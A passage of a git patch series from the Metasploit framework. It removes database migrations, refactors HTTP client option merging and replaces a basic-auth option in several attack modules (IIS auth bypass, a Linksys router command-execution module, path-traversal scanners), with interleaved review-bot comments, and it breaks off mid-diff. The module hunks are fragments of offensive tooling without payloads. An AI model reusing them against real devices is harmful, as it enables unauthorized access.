a/data/sql/migrate/20111204000000_more_inet_columns.rb +++ /dev/null 
@@ -1,17 +0,0 @@ -class MoreInetColumns < ActiveRecord::Migration - - def self.up - change_column :wmap_requests, :address, 'INET using address::INET' - remove_column :wmap_requests, :address6 - change_column :wmap_targets, :address, 'INET using address::INET' - remove_column :wmap_targets, :address6 - end - - def self.down - change_column :wmap_requests, :address, :string, :limit => 16 - add_column :wmap_requests, :address6, :string, :limit => 255 - change_column :wmap_targets, :address, :string, :limit => 16 - add_column :wmap_targets, :address6, :string, :limit => 255 - end - -end diff --git a/data/sql/migrate/20111210000000_add_scope_to_hosts.rb b/data/sql/migrate/20111210000000_add_scope_to_hosts.rb deleted file mode 100755 index 2bbe8f9f77..0000000000 --- a/data/sql/migrate/20111210000000_add_scope_to_hosts.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddScopeToHosts < ActiveRecord::Migration - def self.up - add_column :hosts, :scope, :text - end - - def self.down - remove_column :hosts, :scope - end -end diff --git a/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb b/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb deleted file mode 100755 index 5e9833d884..0000000000 --- a/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddVirtualHostToHosts < ActiveRecord::Migration - def self.up - add_column :hosts, :virtual_host, :text - end - - def self.down - remove_column :hosts, :viritual_host - end -end diff --git a/data/sql/migrate/20120411173220_rename_workspace_members.rb b/data/sql/migrate/20120411173220_rename_workspace_members.rb deleted file mode 100755 index 75003d6d36..0000000000 --- a/data/sql/migrate/20120411173220_rename_workspace_members.rb +++ /dev/null @@ -1,9 +0,0 @@ -class RenameWorkspaceMembers < ActiveRecord::Migration - def up - rename_table :project_members, :workspace_members - end - - def down - rename_table :workspace_members, :project_members - end -end 
diff --git a/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb b/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb deleted file mode 100755 index fcd2f9e0ca..0000000000 --- a/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb +++ /dev/null @@ -1,21 +0,0 @@ -class AddCounterCachesToHosts < ActiveRecord::Migration - - def self.up - add_column :hosts, :note_count, :integer, :default => 0 - add_column :hosts, :vuln_count, :integer, :default => 0 - add_column :hosts, :service_count, :integer, :default => 0 - - Mdm::Host.reset_column_information - Mdm::Host.all.each do |h| - Mdm::Host.reset_counters h.id, :notes - Mdm::Host.reset_counters h.id, :vulns - Mdm::Host.reset_counters h.id, :services - end - end - - def self.down - remove_column :hosts, :note_count - remove_column :hosts, :vuln_count - remove_column :hosts, :service_count - end -end \ No newline at end of file diff --git a/data/sql/migrate/20120625000000_add_vuln_details.rb b/data/sql/migrate/20120625000000_add_vuln_details.rb deleted file mode 100755 index 0f946da39c..0000000000 --- a/data/sql/migrate/20120625000000_add_vuln_details.rb +++ /dev/null 
@@ -1,34 +0,0 @@ -class AddVulnDetails < ActiveRecord::Migration - - def self.up - create_table :vuln_details do |t| - t.integer :vuln_id # Vuln table reference - t.float :cvss_score # 0.0 to 10.0 - t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C) - - t.string :title # Short identifier - t.text :description # Plain text or HTML (trusted) - t.text :solution # Plain text or HTML (trusted) - t.binary :proof # Should be UTF-8, but may not be, sanitize on output - # Technically this duplicates vuln.info, but that field - # is poorly managed / handled today. Eventually we will - # replace vuln.info - - # Nexpose-specific fields - t.integer :nx_console_id # NexposeConsole table reference - t.integer :nx_device_id # Reference from the Nexpose side - t.string :nx_vuln_id # 'jre-java-update-flaw' - t.float :nx_severity # 0-10 - t.float :nx_pci_severity # 0-10 - t.timestamp :nx_published # Normalized from "20081205T000000000" - t.timestamp :nx_added # Normalized from "20081205T000000000" - t.timestamp :nx_modified # Normalized from "20081205T000000000" - t.text :nx_tags # Comma separated - - end - end - - def self.down - drop_table :vuln_details - end -end diff --git a/data/sql/migrate/20120625000001_add_host_details.rb b/data/sql/migrate/20120625000001_add_host_details.rb deleted file mode 100755 index 36e70892fa..0000000000 --- a/data/sql/migrate/20120625000001_add_host_details.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddHostDetails < ActiveRecord::Migration - - def self.up - create_table :host_details do |t| - t.integer :host_id # Host table reference - - # Nexpose-specific fields - t.integer :nx_console_id # NexposeConsole table reference - t.integer :nx_device_id # Reference from the Nexpose side - end - end - - def self.down - drop_table :host_details - end -end diff --git a/data/sql/migrate/20120625000002_expand_details.rb b/data/sql/migrate/20120625000002_expand_details.rb deleted file mode 100755 index bd240ecdc5..0000000000 
--- a/data/sql/migrate/20120625000002_expand_details.rb +++ /dev/null @@ -1,16 +0,0 @@ -class ExpandDetails < ActiveRecord::Migration - - def self.up - add_column :vuln_details, :nx_vuln_status, :text - add_column :vuln_details, :nx_proof_key, :text - add_column :vuln_details, :src, :string - add_column :host_details, :src, :string - end - - def self.down - remove_column :vuln_details, :nx_vuln_status - remove_column :vuln_details, :nx_proof_key - remove_column :vuln_details, :src - remove_column :host_details, :src - end -end diff --git a/data/sql/migrate/20120625000003_expand_details2.rb b/data/sql/migrate/20120625000003_expand_details2.rb deleted file mode 100755 index 4122503692..0000000000 --- a/data/sql/migrate/20120625000003_expand_details2.rb +++ /dev/null @@ -1,24 +0,0 @@ -class ExpandDetails2 < ActiveRecord::Migration - - def self.up - add_column :host_details, :nx_site_name, :string - add_column :host_details, :nx_site_importance, :string - add_column :host_details, :nx_scan_template, :string - add_column :host_details, :nx_risk_score, :float - - add_column :vuln_details, :nx_scan_id, :integer - add_column :vuln_details, :nx_vulnerable_since, :timestamp - add_column :vuln_details, :nx_pci_compliance_status, :string - end - - def self.down - remove_column :host_details, :nx_site_name - remove_column :host_details, :nx_site_importance - remove_column :host_details, :nx_scan_template - remove_column :host_details, :nx_risk_score - - remove_column :vuln_details, :nx_scan_id - remove_column :vuln_details, :nx_vulnerable_since - remove_column :vuln_details, :nx_pci_compliance_status - end -end diff --git a/data/sql/migrate/20120625000004_add_vuln_attempts.rb b/data/sql/migrate/20120625000004_add_vuln_attempts.rb deleted file mode 100755 index b943fe358f..0000000000 --- a/data/sql/migrate/20120625000004_add_vuln_attempts.rb +++ /dev/null 
@@ -1,19 +0,0 @@ -class AddVulnAttempts < ActiveRecord::Migration - - def self.up - create_table :vuln_attempts do |t| - t.integer :vuln_id # Vuln table reference - t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited - t.boolean :exploited # Whether or not the attempt succeeded - t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant - t.string :username # The user that tested this vulnerability - t.text :module # The specific module name that was used - t.integer :session_id # Database identifier of any opened session - t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) - end - end - - def self.down - drop_table :vuln_attempts - end -end diff --git a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb deleted file mode 100755 index c34101fd89..0000000000 --- a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb +++ /dev/null @@ -1,14 +0,0 @@ -class AddVulnAndHostCounterCaches < ActiveRecord::Migration - - def self.up - add_column :hosts, :host_detail_count, :integer, :default => 0 - add_column :vulns, :vuln_detail_count, :integer, :default => 0 - add_column :vulns, :vuln_attempt_count, :integer, :default => 0 - end - - def self.down - remove_column :hosts, :host_detail_count - remove_column :vulns, :vuln_detail_count - remove_column :vulns, :vuln_attempt_count - end -end diff --git a/data/sql/migrate/20120625000006_add_module_details.rb b/data/sql/migrate/20120625000006_add_module_details.rb deleted file mode 100755 index cb99f7ee84..0000000000 --- a/data/sql/migrate/20120625000006_add_module_details.rb +++ /dev/null 
@@ -1,118 +0,0 @@ -class AddModuleDetails < ActiveRecord::Migration - - def self.up - - create_table :module_details do |t| - t.timestamp :mtime # disk modified time - t.text :file # location on disk - t.string :mtype # exploit, auxiliary, post, etc - t.text :refname # module path (no type) - t.text :fullname # module path with type - t.text :name # module title - t.integer :rank # exploit rank - t.text :description # - t.string :license # MSF_LICENSE - t.boolean :privileged # true or false - t.timestamp :disclosure_date # Mar 10 2004 - t.integer :default_target # 0 - t.text :default_action # "scan" - t.string :stance # "passive" - t.boolean :ready # true/false - end - - add_index :module_details, :refname - add_index :module_details, :name - add_index :module_details, :description - add_index :module_details, :mtype - - create_table :module_authors do |t| - t.integer :module_detail_id - t.text :name - t.text :email - end - add_index :module_authors, :module_detail_id - - create_table :module_mixins do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_mixins, :module_detail_id - - create_table :module_targets do |t| - t.integer :module_detail_id - t.integer :index - t.text :name - end - add_index :module_targets, :module_detail_id - - create_table :module_actions do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_actions, :module_detail_id - - create_table :module_refs do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_refs, :module_detail_id - add_index :module_refs, :name - - create_table :module_archs do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_archs, :module_detail_id - - create_table :module_platforms do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_platforms, :module_detail_id - - end - - def self.down - remove_index :module_details, :refname - remove_index :module_details, :name - remove_index :module_details, 
:description - remove_index :module_details, :mtype - - remove_index :module_authors, :module_detail_id - remove_index :module_mixins, :module_detail_id - remove_index :module_targets, :module_detail_id - remove_index :module_actions, :module_detail_id - remove_index :module_refs, :module_detail_id - remove_index :module_refs, :name - remove_index :module_archs, :module_detail_id - remove_index :module_platform, :module_detail_id - - drop_table :module_details - drop_table :module_authors - drop_table :module_mixins - drop_table :module_targets - drop_table :module_actions - drop_table :module_refs - drop_table :module_archs - drop_table :module_platforms - - end -end - -=begin - -Mdm::Host.find_by_sql(" -SELECT - hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref -FROM - hosts,vulns,vulns_refs,refs,module_refs,module_details -WHERE - hosts.id = vulns.host_id AND - vulns.id = vulns_refs.vuln_id AND - vulns_refs.ref_id = refs.id AND - refs.name = module_refs.name AND - module_refs.module_detail_id = modules_details.id -").map{|x| [x.address, x.mname, x.vname, x.vref ] } - - -=end diff --git a/data/sql/migrate/20120625000007_add_exploit_attempts.rb b/data/sql/migrate/20120625000007_add_exploit_attempts.rb deleted file mode 100755 index 22d3ec0b1f..0000000000 --- a/data/sql/migrate/20120625000007_add_exploit_attempts.rb +++ /dev/null 
@@ -1,26 +0,0 @@ -class AddExploitAttempts < ActiveRecord::Migration - - def self.up - create_table :exploit_attempts do |t| - t.integer :host_id # Host table reference (primary) - t.integer :service_id # Service table reference (optional) - t.integer :vuln_id # Vuln table reference (optional) - t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited - t.boolean :exploited # Whether or not the attempt succeeded - t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant - t.string :username # The user that tested this vulnerability - t.text :module # The specific module name that was used - t.integer :session_id # Database identifier of any opened session - t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) - t.integer :port # Port -> Services are created/destroyed frequently and failed - t.string :proto # Protocol | attempts may be against closed ports. - end - - add_column :hosts, :exploit_attempt_count, :integer, :default => 0 - end - - def self.down - drop_table :exploit_attempts - remove_column :hosts, :exploit_attempt_count - end -end diff --git a/data/sql/migrate/20120625000008_add_fail_message.rb b/data/sql/migrate/20120625000008_add_fail_message.rb deleted file mode 100755 index 7d6dd0f96b..0000000000 --- a/data/sql/migrate/20120625000008_add_fail_message.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddFailMessage < ActiveRecord::Migration - - def self.up - add_column :vuln_attempts, :fail_detail, :text - add_column :exploit_attempts, :fail_detail, :text - end - - def self.down - remove_column :vuln_attempts, :fail_detail - remove_column :exploit_attempts, :fail_detail - end -end diff --git a/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb deleted file mode 100644 index 2160e61de6..0000000000 
--- a/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb +++ /dev/null @@ -1,13 +0,0 @@ -class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration - - def self.up - add_column :web_vulns, :owner, :string - add_column :web_vulns, :payload, :text - end - - def self.down - remove_column :web_vulns, :owner - remove_column :web_vulns, :payload - end - -end diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index a5bdf41fef..42974b229a 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -69,7 +69,7 @@ class DBManager self.framework = framework self.migrated = false - self.migration_paths = [ ::File.join(Msf::Config.install_root, "data", "sql", "migrate") ] + self.migration_paths = [] self.modules_cached = false self.modules_caching = false @@ -82,6 +82,10 @@ class DBManager end initialize_database_support + + # have to set migration paths after initialize_database_support as it loads + # MetasploitDataModels. + self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s end # From 862b8137865592b613f784edecddeeac2be2ae2b Mon Sep 17 00:00:00 2001 From: Tasos Laskos Date: Fri, 1 Mar 2013 18:33:16 +0200 Subject: [PATCH 121/139] Auxiliary::Web: fixed confidence calc in log methods --- lib/msf/core/auxiliary/web.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 48428b720c..70c824bfcb 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -179,7 +179,7 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => details[:category] || opts[:confidence] || 100, + :confidence => calculate_confidence( parent.vulns[mode][vhash] ), :owner => self } 
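Review bot: The added `self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s` dereferences a constant that, per the comment on the line above it, is only brought in by `initialize_database_support`; if that call returns without loading the gem (a run without database support, or a load error it handles internally), DBManager construction now dies with NameError instead of simply ending up with an empty migration_paths list as the `@@ -69` hunk initialises it. Guard the append on the constant actually existing: `self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s if defined?(MetasploitDataModels)`. Whether initialize_database_support can return in that state is not visible here, so confirm against its body before deciding the guard is needed. The enclosing initialize method starts outside the hunk.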
@@ -211,7 +211,7 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => details[:category] || opts[:confidence] || 100, + :confidence => calculate_confidence( parent.vulns[mode][vhash] ), :owner => self } From 902948e5d395e244165e9d5c9e00a8e3faa97f76 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Mar 2013 11:01:00 -0600 Subject: [PATCH 122/139] cleanup options --- lib/rex/proto/http/client.rb | 43 ++++------------------------ lib/rex/proto/http/client_request.rb | 3 +- 2 files changed, 8 insertions(+), 38 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 38b5c3ac2b..47fa021f4f 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -129,23 +129,12 @@ class Client # # @return [ClientRequest] def request_raw(opts={}) - opts['agent'] ||= config['agent'] - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - + opts = self.config.merge(opts) + + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - + req = ClientRequest.new(opts) end 
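Review bot: Replacing the `||=` chain with `opts = self.config.merge(opts)` changes what an explicit nil in the caller's options does: `request_raw('method' => nil)` used to fall back to `'GET'`, but Hash#merge keeps the nil, and the `DefaultConfig.merge(opts)` in ClientRequest#initialize (visible later in this series) keeps it as well, so the request is built with a nil method, uri or headers. Modules that pass `datastore['SOMETHING']` straight through hit this whenever that option is unset. Dropping nils before merging restores the old fallback: `opts = self.config.merge(opts.reject { |_k, v| v.nil? })`. The merge is also shallow, so the `'headers'` hash from config is shared by reference with every request; if ClientRequest ever mutates it, later requests inherit the change, which is worth confirming in client_request.rb.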
@@ -162,33 +151,13 @@ class Client # # @return [ClientRequest] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] ||= config['basic_auth'] || '' - opts['cookie'] ||= config['cookie'] + opts = self.config.merge(opts) + opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['data'] ||= '' - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] ||= config['raw_headers'] || '' - opts['uri'] ||= '/' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} - opts['version'] ||= config['version'] || '1.1' - opts['vhost'] ||= config['vhost'] - opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port - if opts['encode_params'] == true or opts['encode_params'].nil? - opts['encode_params'] = true - else - opts['encode_params'] = false - end - req = ClientRequest.new(opts) end diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 039d11559d..c941342fe7 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -27,6 +27,7 @@ class ClientRequest 'path_info' => '', 'port' => 80, 'proto' => 'HTTP', + 'query' => '', 'ssl' => false, 'uri' => '/', 'vars_get' => {}, @@ -38,7 +39,7 @@ class ClientRequest # Evasion options # 'encode_params' => true, - 'encode' => true, + 'encode' => false, 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool From ac65c54cc53aacd527df02057340e3f26a626c95 Mon Sep 17 00:00:00 2001 From: Tasos Laskos Date: Fri, 1 Mar 2013 19:37:41 +0200 Subject: [PATCH 123/139] Auxiliary::Web: fixed the previous confidence fix --- lib/msf/core/auxiliary/web.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 70c824bfcb..36571c5ac4 100644 
--- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -179,10 +179,11 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => calculate_confidence( parent.vulns[mode][vhash] ), :owner => self } + info[:confidence] = calculate_confidence( info ) + report_web_vuln( info ) print_good " FOUND(#{mode.to_s.upcase}) URL(#{location})" @@ -211,10 +212,11 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => calculate_confidence( parent.vulns[mode][vhash] ), :owner => self } + info[:confidence] = calculate_confidence( info ) + report_web_vuln( info ) print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" From 7b8654a71d712ecd8158659c6c939827a3a49b64 Mon Sep 17 00:00:00 2001 From: Samuel Huckins Date: Fri, 1 Mar 2013 11:41:06 -0600 Subject: [PATCH 124/139] Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence" This reverts commit 3840ddccbce47cacb33415ad8301a4cf04fa7462, reversing changes made to e1891f08366c459701a13f545a13ce5b926e89f6. --- lib/msf/core/auxiliary/web.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 70c824bfcb..48428b720c 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -179,7 +179,7 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => calculate_confidence( parent.vulns[mode][vhash] ), + :confidence => details[:category] || opts[:confidence] || 100, :owner => self } 
@@ -211,7 +211,7 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => calculate_confidence( parent.vulns[mode][vhash] ), + :confidence => details[:category] || opts[:confidence] || 100, :owner => self } From 4212c36566836d99d8bf16db5dffa7dc84013d26 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Mar 2013 11:59:02 -0600 Subject: [PATCH 125/139] Fix up basic auth madness --- lib/msf/core/exploit/http/client.rb | 7 +++---- lib/rex/proto/http/client.rb | 1 - lib/rex/proto/http/client_request.rb | 6 ------ .../auxiliary/admin/http/iis_auth_bypass.rb | 2 +- .../admin/http/intersil_pass_reset.rb | 4 ++-- .../admin/http/linksys_wrt54gl_exec.rb | 4 ++-- .../admin/http/netgear_sph200d_traversal.rb | 4 ++-- modules/auxiliary/gather/xbmc_traversal.rb | 2 +- .../auxiliary/scanner/http/http_traversal.rb | 8 +++----- .../auxiliary/scanner/http/jboss_vulnscan.rb | 2 +- .../multi/http/netwin_surgeftp_exec.rb | 2 +- spec/lib/rex/proto/http/client_spec.rb | 20 ------------------- 12 files changed, 16 insertions(+), 46 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 5d8a48891e..6769a44b9a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -163,7 +163,6 @@ module Exploit::Remote::HttpClient nclient.set_config( 'vhost' => self.vhost(), 'agent' => datastore['UserAgent'], - 'basic_auth' => self.basic_auth, 'uri_encode_mode' => datastore['HTTP::uri_encode_mode'], 'uri_full_url' => datastore['HTTP::uri_full_url'], 'pad_method_uri_count' => datastore['HTTP::pad_method_uri_count'], 
@@ -292,9 +291,9 @@ module Exploit::Remote::HttpClient # # Combine the user/pass into an auth string for the HTTP Client # - def basic_auth - return if not datastore['USERNAME'] - datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') + def basic_auth(username, password) + auth_str = Rex::Text.encode_base64("#{username}:#{password}") + "Basic #{auth_str}" end ## diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 47fa021f4f..4a8d8108f3 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -113,7 +113,6 @@ class Client # # @param opts [Hash] # @option opts 'agent' [String] User-Agent header value - # @option opts 'basic_auth' [String] Basic-Auth header value # @option opts 'connection' [String] Connection header value # @option opts 'cookie' [String] Cookie header value # @option opts 'data' [String] HTTP data (only useful with some methods, see rfc2616) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c941342fe7..e0cdb4946f 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -87,12 +87,6 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) - - # Backwards compatibility for wonky basic authentication api from - # the dawn of time. - if opts['basic_auth'] and not opts['authorization'] - @opts['authorization'] = "Basic #{Rex::Text.encode_base64(opts['basic_auth'])}" - end end def to_s diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index d900abe8e7..0e051223a7 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => dir, 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) vprint_status(res.body) if res 
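Review bot: The new `basic_auth(username, password)` drops the old `return if not datastore['USERNAME']` guard, so a caller with no credentials now gets a real header value, `Basic Og==` (the encoding of a bare `:`), instead of nil, and any call site that invokes it unconditionally will send a bogus Authorization header on every request. Separately, the Basic scheme splits on the first `:` and RFC 7617 declares a user-id containing a colon invalid, yet nothing here rejects or warns about one. I would state both in the method's comment so callers know to guard: `# @param username [String] must not contain ':' (RFC 7617); nil credentials still yield 'Basic Og==', so skip the header when no username is set` and `# @return [String] value for the 'authorization' request option`.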
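Review bot: Removing the `opts['basic_auth']` compatibility branch from ClientRequest#initialize makes the failure mode silent: a module or external caller still passing `'basic_auth' => 'user:pass'` now sends an unauthenticated request with no error, since the key presumably just rides along in `@opts` unused after `DefaultConfig.merge(opts)`. For a pentest module that means false negatives rather than a visible break. Prefer a loud deprecation for at least one release: `raise ArgumentError, "'basic_auth' is no longer supported; pass 'authorization' => basic_auth(user, pass)" if opts['basic_auth'] && !opts['authorization']`. The rest of initialize is outside the hunk, so a warning via the project's logging could stand in for the raise if that is preferred.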
diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 12934c9a0e..fb32e1f41c 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri'=> uri, 'method'=>'GET', - 'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}" + 'authorization' => basic_auth(Rex::Text.rand_text_alpha(127),datastore['PASSWORD']) }) if res.nil? @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', - 'basic_auth' => "admin:#{datastore['PASSWORD']}" + 'authorization' => basic_auth('admin', datastore['PASSWORD']) }) if not res diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 189f937ea1..2adf4bb5e8 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) unless (res.kind_of? Rex::Proto::Http::Response) @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', - 'basic_auth' => "#{user}:#{pass}", + 'authorization' => basic_auth(user,pass), #'data' => data_cmd, 'vars_post' => { diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 632a991c0f..909afe5443 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb 
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(traversal, file), - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) return :abort if res.nil? diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 3f03554c15..a1bcb87489 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", - 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" + 'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']) }, 25) rescue Rex::ConnectionRefused print_error("#{rhost}:#{rport} Could not connect.") diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index a5f6c194f8..eedc2a72ce 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -28,8 +28,7 @@ class Metasploit3 < Msf::Auxiliary source against PHP applications. The 'WRITABLE' action can be used to determine if the trigger can be used to write files outside the www directory. - To use the 'COOKIE' option, set your value like so: "name=value". To use - the 'BASICAUTH' option, set it like this: "username:password". + To use the 'COOKIE' option, set your value like so: "name=value". }, 'Author' => [ 
@@ -70,8 +69,7 @@ class Metasploit3 < Msf::Auxiliary # We favor automatic OptString.new('TRIGGER', [false,'Trigger string. Ex: ../', '']), OptString.new('FILE', [false, 'Default file to read for the fuzzing stage', '']), - OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']), - OptString.new('BASICAUTH', [false, 'Credential to use for basic auth (Ex: admin:admin)', '']) + OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']) ], self.class) deregister_options('RHOST') @@ -155,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary req['uri'] = this_path req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty? req['data'] = datastore['DATA'] if not datastore['DATA'].empty? - req['basic_auth'] = datastore['BASICAUTH'] if not datastore['BASICAUTH'].empty? + req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) return req end diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index d6dc7c3638..41f5566772 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -129,7 +129,7 @@ class Metasploit3 < 